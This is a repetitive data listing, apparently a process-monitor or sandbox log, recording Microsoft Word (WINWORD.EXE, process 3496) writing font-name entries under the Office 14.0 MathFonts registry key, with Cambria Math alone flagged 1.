Arial Unicode MS
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Baskerville Old Face
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Batang
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BatangChe
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bauhaus 93
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bell MT
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB Demi
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bernard MT Condensed
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Blackadder ITC
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Black
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Condensed
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Poster Compressed
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Book Antiqua
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookman Old Style
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookshelf Symbol 7
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bradley Hand ITC
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Britannic Bold
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Broadway
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Browallia New
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BrowalliaUPC
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Brush Script MT
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Californian FB
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calisto MT
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria Math
1
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Candara
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Castellar
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Centaur
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Gothic
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Schoolbook
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Chiller
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Colonna MT
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Comic Sans MS
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Consolas
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Constantia
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cooper Black
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Bold
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Light
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Corbel
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cordia New
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
CordiaUPC
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Courier
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Courier New
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Curlz MT
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DaunPenh
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
David
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DFKai-SB
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DilleniaUPC
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DokChampa
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Dotum
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DotumChe
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ebrima
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Edwardian Script ITC
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Elephant
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Engravers MT
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Bold ITC
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Demi ITC
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Light ITC
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Medium ITC
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Estrangelo Edessa
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
EucrosiaUPC
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Euphemia
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FangSong
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Felix Titling
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Fixedsys
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Footlight MT Light
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Forte
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Book
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi Cond
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Heavy
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium Cond
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FrankRuehl
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FreesiaUPC
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Freestyle Script
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
French Script MT
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gabriola
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Garamond
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gautami
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Georgia
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gigi
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Condensed
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Ext Condensed Bold
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold Condensed
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gisha
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gloucester MT Extra Condensed
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Old Style
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Stout
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gulim
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GulimChe
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gungsuh
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GungsuhChe
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Haettenschweiler
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harlow Solid Italic
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harrington
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
High Tower Text
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Impact
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Imprint MT Shadow
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Informal Roman
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
IrisUPC
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Iskoola Pota
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
JasmineUPC
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Jokerman
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Juice ITC
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KaiTi
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kalinga
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kartika
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Khmer UI
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KodchiangUPC
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kokila
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kristen ITC
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kunstler Script
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lao UI
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Latha
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Leelawadee
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Levenim MT
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
LilyUPC
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Bright
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Calligraphy
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Console
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Fax
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Handwriting
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Typewriter
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Unicode
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Magneto
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Maiandra GD
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Malgun Gothic
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mangal
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Marlett
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Matura MT Script Capitals
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo UI
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Himalaya
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft JhengHei
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft New Tai Lue
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft PhagsPa
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Sans Serif
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Tai Le
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Uighur
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft YaHei
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Yi Baiti
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS-ExtB
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU-ExtB
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam Fixed
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mistral
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Modern No. 20
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mongolian Baiti
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Monotype Corsiva
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MoolBoran
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Gothic
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Mincho
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Outlook
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PGothic
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PMincho
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Sans Serif
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Specialty
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Sans Serif
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Serif
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS UI Gothic
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MT Extra
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MV Boli
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Narkisim
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Engraved
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Solid
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
NSimSun
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Nyala
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
OCR A Extended
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Old English Text MT
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Onyx
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palace Script MT
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palatino Linotype
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Papyrus
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Parchment
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua Titling MT
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Plantagenet Cherokee
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Playbill
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU-ExtB
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Poor Richard
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Pristina
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Raavi
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rage Italic
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ravie
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Condensed
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Extra Bold
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rod
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sakkal Majalla
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Script MT Bold
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Print
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Script
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Light
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Semibold
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Symbol
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shonar Bangla
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Showcard Gothic
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shruti
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimHei
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic Fixed
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun-ExtB
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Small Fonts
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Snap ITC
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Stencil
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sylfaen
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Symbol
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
System
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tahoma
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tempus Sans ITC
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Terminal
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Times New Roman
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Traditional Arabic
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Trebuchet MS
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tunga
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed Extra Bold
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Utsaah
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vani
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Verdana
0
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
